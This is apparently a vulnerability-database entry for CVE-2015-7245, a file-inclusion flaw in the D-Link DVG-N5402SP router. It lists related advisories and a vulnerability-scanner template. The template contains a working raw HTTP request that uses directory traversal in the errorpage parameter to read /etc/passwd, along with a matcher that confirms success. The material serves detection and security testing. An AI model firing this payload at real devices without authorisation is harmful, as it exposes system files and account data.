| Title | Published | Views | Reporter |
|---|---|---|---|
| D-Link DVGN5402SP - Multiple Vulnerabilities | 4 Feb 2016 00:00 | – | zdt |
| D-Link DVG-N5402SP Directory Traversal Vulnerability | 22 Feb 2016 00:00 | – | cnvd |
| CVE-2015-7245 | 24 Apr 2017 18:00 | – | cve |
| CVE-2015-7245 | 24 Apr 2017 18:00 | – | cvelist |
| D-Link DVGN5402SP - Multiple Vulnerabilities | 4 Feb 2016 00:00 | – | exploitdb |
| D-Link DVGN5402SP - Multiple Vulnerabilities | 4 Feb 2016 00:00 | – | exploitpack |
| CVE-2015-7245 | 24 Apr 2017 18:59 | – | nvd |
| D-Link DVG-N5402SP Path Traversal / Information Disclosure | 3 Feb 2016 00:00 | – | packetstorm |
| Directory traversal | 24 Apr 2017 18:59 | – | prion |
| PT-2017-7165 · D Link · Dvg-N5402Sp | 24 Apr 2017 00:00 | – | ptsecurity |
```yaml
id: CVE-2015-7245

info:
  name: D-Link DVG-N5402SP - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.
  impact: |
    An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information.
  remediation: |
    Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability.
  reference:
    - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
    - https://www.exploit-db.com/exploits/39409/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-7245
    cwe-id: CWE-22
    epss-score: 0.45479
    epss-percentile: 0.98633
    cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: d-link
    product: dvg-n5402sp_firmware
  tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link,vuln

http:
  - raw:
      - |
        POST /cgibin/webproc HTTP/1.1
        Host: {{Hostname}}

        getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a004730450220631dd9b0b56766a662574346abf352640f454211fca4985065559c57ef7ec2d3022100fc16d60ca3631664d1cc5e4adf52d50d5a80e561bcae37c9c9df5c5eed4a22b1:922c64590222798bb761d5b6d8e72950
```